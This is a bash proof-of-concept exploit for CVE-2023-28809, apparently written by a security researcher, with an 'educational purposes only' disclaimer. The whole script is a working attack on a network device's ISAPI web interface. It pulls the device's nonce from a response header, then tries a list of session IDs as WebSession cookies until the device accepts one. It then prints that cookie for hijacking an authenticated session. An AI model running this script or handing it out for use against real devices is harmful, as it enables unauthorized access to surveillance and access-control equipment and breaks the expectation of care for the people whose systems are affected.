#!/bin/bash
# This script is written for educational purposes only. Use it at your own risk.
# The author does not take responsibility for possible damages.
# CVE: 2023-28809
#
# Andres Hinnosaar
# rsch::@::hinnosaar.com
#
# variables
# List of session ID-s as input
file=$1
# target IP as input
target=$2
path=/ISAPI/System/deviceInfo 
# to generate an authentication cookie this script also request nonce from API which is static value for device
nonce=$(curl -k -s -D - -o /dev/null https://"$target""$path" |  grep -o -P '(?<=realm="DS-).*(?=", nonce)')

if [ -z "$1" ] | [ -z "$2" ];
then
	echo "error: missing input"
	echo "please run the script as following:"
	echo ""
	echo "./poc.sh sessionlist.txt <ip>"
	echo ""
	echo "exiting"
	exit 1
fi

echo ""
echo "Requesting nonce value for $target"
if [ -z "$nonce" ];
then
	echo ""
	echo "error: did not found nonce"
	echo "       can not continue"
	echo ""
	echo "please check the nonce path manually"
	echo ""
	echo "exiting"
	exit 1
fi

echo "nonce found!"
echo "nonce value: "$nonce
echo ""


while IFS= read -r line
do
	validate=$(curl -s -o /dev/null -w "%{http_code}" -k --cookie "Cookie: WebSession_""$nonce""CC=""$line" -I -X GET https://$target$path)
#debug
#	echo "query: ""("curl" -s -o /dev/null -w "%{http_code}" -k --cookie "Cookie: WebSession_""$nonce""CC=""$line" -I -X GET https://$target$path)"
	echo "https://""$target""$path"
	echo "cookie: WebSession_""$nonce""CC=""$line"
	echo "response code: $validate"
	if [ "$validate" == "200" ]; then
		echo ""
		echo ""
		echo "Valid sessionID found: $line"
		echo "you can use following cookie to authenticate:"
		echo "cookie: WebSession_""$nonce""CC=""$line"
		exit 1
	fi
	echo "we did not manage to detect any authenticated SessionID-s"
	echo ""
	echo "Better luck next time :)"
	echo ""
	echo ""
done < "$file"
